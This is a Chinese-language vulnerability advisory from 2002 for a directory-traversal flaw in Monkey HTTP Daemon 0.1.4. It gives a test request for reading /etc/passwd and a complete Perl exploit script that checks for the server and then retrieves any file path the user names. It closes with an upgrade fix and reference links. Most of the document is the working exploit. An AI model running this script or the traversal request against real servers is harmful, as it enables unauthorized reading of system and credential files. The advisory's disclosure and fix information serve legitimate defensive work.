Monkey HTTP Server存在文件泄露漏洞发布时间:2002-09-28 更新时间:2002-09-28 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5792 受影响系统 Monkey Monkey HTTP Daemon 0.1.4详细描述 Monkey是HTTP服务程序,支持HEAD和GET模式。 Monkey没有检查带../字符的HTTP请求,攻击者可以提交多个../字符而查看系统上任意文件内容。 测试代码 GET //../../../../../../../../../etc/passwd HTTP/1.0 ---cut here--- #!/usr/bin/perl # # (0 day;) Monkey-0.1.4 reverse traversal exploit # # Usage: # perl monkey.pl <hostname> <httpport> <file> # # <hostname> - target host # <httpport> - port on which HTTP daemon is listening # <file> - file which you wanna get # # Example: # perl monkey.pl www.ii-labs.org 80 /etc/passwd # # by DownBload <downbload@hotmail.com> # Illegal Instruction Labs # use IO::Socket; sub sock () { $SOCK = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => "tcp") || die "[ ERROR: Can't connect to $host!!! ]\n\n"; } sub banner() { print "[--------------------------------------------------]\n"; print "[ Monkey-0.1.4 reverse traversal exploit ]\n"; print "[ by DownBload <downbload\@hotmail.com> ]\n"; print "[ Illegal Instruction Labs ]\n"; print "[--------------------------------------------------]\n"; } if ($#ARGV != 2) { banner(); print "[ Usage: ]\n"; print "[ perl monkey.pl <hostname> <httpport> <file> ]\n"; print "[--------------------------------------------------]\n"; exit(0); } $host = $ARGV[0]; $port = $ARGV[1]; $file = $ARGV[2]; banner(); print "[ Connecting to $host... ]\n"; sock(); print "[ Sending probe... ]\n"; print $SOCK "HEAD / HTTP/1.0\n\n"; while ($a = <$SOCK>) { $line = $line . $a; } if ($line =~ /Monkey/) { print "[ Monkey HTTP server found, continuing... ]\n"; } else { die "[ SORRY: That's not Monkey HTTP server :( ]\n\n"; } close ($SOCK); print "[ Connecting to $host... ]\n"; sock(); print "[ Sending GET request... ]\n"; print $SOCK "GET //../../../../../../../../../$file HTTP/1.0\n\n"; print "[ Waiting for response... ]\n\n"; while ($line = <$SOCK>) { print $line; } close ($SOCK); ---cut here--- 解决方案 升级程序: Monkey Monkey HTTP Daemon 0.1.4: Monkey Upgrade Monkey HTTP Daemon v0.5 http://monkeyd.sourceforge.net/down.php?vrs=MC41LjA= 相关信息 参考:http://online.securityfocus.com/archive/1/293048 相关主页:http://monkeyd.sourceforge.net/ |
